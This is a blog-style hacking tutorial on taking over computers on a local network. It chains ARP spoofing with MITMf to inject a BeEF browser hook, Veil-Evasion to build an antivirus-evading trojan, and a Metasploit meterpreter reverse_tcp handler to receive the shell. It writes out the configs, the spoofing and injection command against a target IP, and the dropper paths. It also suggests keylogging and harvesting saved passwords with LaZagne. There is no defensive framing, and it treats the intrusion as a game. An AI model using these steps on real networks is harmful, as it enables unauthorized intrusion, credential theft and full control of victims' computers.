Break into any computer on LAN with Beef + Mitmf + Veil Evasion + Metasploit

Idea: Beef + Mitmf + Veil Evasion + Metasploit.


Beef: Used to upload the file containing the trojan that Veil Evasion created to the victim’s computer via a web browser


Mitmf is responsible for injecting hook.js to any website when the victim opens any new website.


Mitmf can also inject any trojan file into the victim’s computer when the victim downloads a .zip file to the computer without knowing that the .zip file is infected with the trojan.

Mitmf can also record keystrokes on the victim’s computer when accessing the web browser via jskeylogger


Veil Evasion: create a trojan that bypasses all anti-virus software without being detected running in the background of the victim’s computer. create trojan with IP and PORT of hacker computer.


Metasploit. Always listen at the hacker’s IP and PORT when the victim opens the file containing the trojan, the hacker will break into the victim’s computer and take full control. By using commands in Metasploit. The next series of articles I will guide you to use Metasploit Untimate. To increase the fun and uniqueness, you can combine Lazagne to get the user and password information that the victim has saved on the web browser. ===> self-advocacy added

Prepare:

https://github.com/byt3bl33d3r/MITMf
https://github.com/Veil-Framework/Veil-Evasion

http://beefproject.com/

OS: Kali Linux.

Perform:

1. Config Beef.

CD /usr/share/beef-xss/extensions/metasploit.

vi config.yaml

host: “192.168.1.12”

callback_host: “192.168.1.12”

{os: ‘custom’, path: ‘/usr/share/metasploit-framework/’}

cd /usr/share/beef-xss

vi config.yaml

metasploit:
enable: true

Run Beef ./beef

Enter the following address in your browser UI URLs: http://192.168.1.12:3000/ui/panel user and password default: beef and beef

Run Veil Evasion.

./Veil-Evasion.py


Run Metasploit.

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.12:4444 [*] Starting the payload handler…

Run Mitmf.

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.18 –inject –js-url http://192.168.1.12:3000/hook.js

To make the game more fun and interesting, I searched on the internet for a song with the hacker’s signature style and will play on the victim’s computer through Beef. when i do this my computer will automatically play music without any warning.

Copy the song here.

/usr/share/beef-xss/extensions/demos/html

copy the generated trojan here.

/usr/share/beef-xss/extensions/social_engineering/droppers

/usr/share/beef-xss/modules/exploits/local_host/firefox_extension_dropper/dropper

My next idea would be to load a trojan into the victim’s computer via Beef using the Fake Flash Updae feature in Social Engineering.

In the end, we successfully break into the victim’s computer and also play music for the victim to listen to. There are many more techniques in this article that I do not publicize because of its dangerous nature. people do their own research and think more

(hackerutudent93 and source from Whitehat.vn)